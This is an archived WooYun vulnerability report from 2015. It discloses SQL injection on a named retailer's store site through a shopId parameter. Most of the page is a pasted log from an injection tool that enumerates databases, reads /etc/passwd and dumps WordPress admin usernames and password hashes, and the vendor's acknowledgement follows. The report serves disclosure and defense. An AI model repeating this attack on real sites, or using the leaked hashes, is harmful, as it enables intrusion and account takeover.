乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-02-02: 细节已通知厂商并且等待厂商处理中 2015-02-04: 厂商已经确认,细节仅向厂商公开 2015-02-14: 细节向核心白帽子及相关领域专家公开 2015-02-24: 细节向普通白帽子公开 2015-03-06: 细节向实习白帽子公开 2015-03-19: 细节向公众公开
............
......
......把胡萝卜的运行日志贴出来Target: http://store.rrs.com/experience-store/ajaxJsp/experience_store.jsp?postType=getExperienceStore&shopId=3Host IP: 60.211.209.144Web Server: nginx/1.7.0DB Server: MySQLResp. Time(avg): 93 msCurrent User: [email protected]Current DB: experience_storeSystem User: [email protected]Compile OS: LinuxDB User: 'tony'@'%'Data Bases: information_schemaSql Version: 5.5.18.1-log activity brandcoupon experience_store mysql performance_schema store waterHost IP: 60.211.209.144Web Server: nginx/1.7.0Can not find keyword but let me do a try!I guess injection type is Integer?! If injection failed, retry with a manual keyword.Can't find db server type! But maybe there be some chances! [-o<Finding columns count(MySQL,MsSQL 2005): 10Error (10060): The attempt to connect timed outTurning on mod_security bypassFinding columns count(MySQL,MsSQL 2005): 2Error (10060): The attempt to connect timed outSelected Column Count is 10Valid String Column is 1DB Server: MySQLCurrent DB: experience_storeCurrent User: [email protected]Current DB: experience_storeSystem User: [email protected]Compile OS: LinuxDb user: 'tony'@'%'Data Base Found: information_schemaSql Version: 5.5.18.1-logData Base Found: activityData Base Found: brandcouponData Base Found: experience_storeData Base Found: mysqlData Base Found: performance_schemaData Base Found: storeData Base Found: waterCount(table_name) of information_schema.tables where table_schema=0x6272616E64636F75706F6E is 5Error (10060): The attempt to connect timed outCan not get all tables by group_concat!Count(table_name) of information_schema.tables where table_schema=0x6272616E64636F75706F6E is 5Table found: activityTable found: articleTable found: article_picTable found: our_articleTable found: phoneCount(column_name) of information_schema.columns where table_schema=0x6272616E64636F75706F6E and table_name=0x70686F6E65 is 3Column found: idColumn found: phoneColumn found: operatetimeCount(table_name) of information_schema.tables where table_schema=0x73746F7265 is 0Bypassing illegal union failed! Turning off this featureIt seems information_schema table does not exist! Trying to guess tables!Guessing table(66/686): tbl_tbadminCanceling...Total tables found: 0Job Canceled!Count(table_name) of information_schema.tables where table_schema=0x7761746572 is 11Table found: wp_commentmetaTable found: wp_commentsTable found: wp_postmetaTable found: wp_linksTable found: wp_postsTable found: wp_term_relationshipsTable found: wp_term_taxonomyTable found: wp_termsTable found: wp_usersTable found: wp_optionsReading file: /etc/passwdFile was readCount(column_name) of information_schema.columns where table_schema=0x7761746572 and table_name=0x77705F7573657273 is 10Column found: IDColumn found: user_loginColumn found: user_passColumn found: user_nicenameColumn found: user_urlColumn found: user_registeredColumn found: user_activation_keyColumn found: user_statusColumn found: display_nameColumn found: user_emailCount(*) of water.wp_users is 2Data Found: user_login,user_pass=admin^$P$BlURguHDipQnbzCt84KEOhoF1DOtwA/Data Found: user_login,user_pass=qilin^$P$Bm5AvyG0lQ.8dVSFsPoMBi7r64NrjV1
..........
危害等级:中
漏洞Rank:8
确认时间:2015-02-04 14:47
感谢您的测试与提醒,我方已安排人员进行处理!
暂无